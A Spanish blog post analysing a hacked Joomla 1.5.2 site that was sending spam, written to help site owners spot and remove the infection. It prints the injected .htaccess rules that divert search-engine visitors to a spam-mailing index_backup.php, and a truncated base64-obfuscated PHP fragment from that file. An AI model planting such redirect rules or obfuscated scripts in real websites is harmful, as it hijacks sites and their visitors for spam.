Virus en Joomla

Escrito por Sergio Anton Hinojar el . Posteado en Blog, Virus

Versiones de Joomla antiguas

En muchas ocasiones somos listados en los servidores por enviar SPAM y en la mayoria de ocasiones, no hemos hecho nada directamente para que nos metan en listas negras. Cuando te das cuenta de esto, hay que mrar de donde están saliendo los correos. Mirando los logs, los scripts que se ejecutan diariamente, las páginas web si se tienen etc…

En este caso en particular os quiero comentar el problema de insercción de código en una página web. Se trata de una página hecha en Joomla con versión 1.5.2

En la mayoria de casos aparece o se reescribe el .htacces que realiza cambios en las escrituras de url entre otras cosas. En este caso, el fichero .htacces se ha cambiado de permisos. Se ha establecido permisos 444, lo que quiere decir que no se puede modificar si no lo cambias a 744. Una vez cambiado, hay que abrirlo y ver que inserción de código se ha realizado. En este caso, se ha insertado el siguiente:

RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista..)\.(.*) RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC] RewriteCond %{REQUEST_FILENAME} !/index_backup.php RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]

Este código le está diciendo que todo visita que sea referente de alguno de estos nombres, vaya a la página indicad (index_backup.php) la cual lo que hace es generar y enviar mails masvios…

Esta página index_backup.php contiene este srcript detallado a continuación.

<? $GLOBALS['_62805507_']=Array(base64_decode(''.'ZG'.'VmaW5'.'l'),base64_decode('ZmlsZV'.'9nZ'.'XRf ...... ...... l__1($_5,$_14[_1051993851(21)],$_14[_1051993851(22)],$_14[_1051993851(23)]);}elseif(@$GLOBALS['_62805507_'][28](_1051993851(24))){echo l__2($_2);}}}

Como recomendación, os diré que sigais los pasos publicados en este otro artículo que hicimos en su dia explicando al detalle como protegerse y eliminar algunos virus del server

Etiquetas:, ,

"Trackback" Enlace desde tu web.

Sergio Anton Hinojar

Apasionado del mundo de Internet y business development. Consultor web. Desarrollo de negocios en Internet. SEO, SEM, SMO, marketing online, redes sociales, analitica web, ecommerce... Amante de la buena música, de la guitarra, la bicicleta, la pesca...

Deja un comentario

Time limit is exhausted. Please reload CAPTCHA.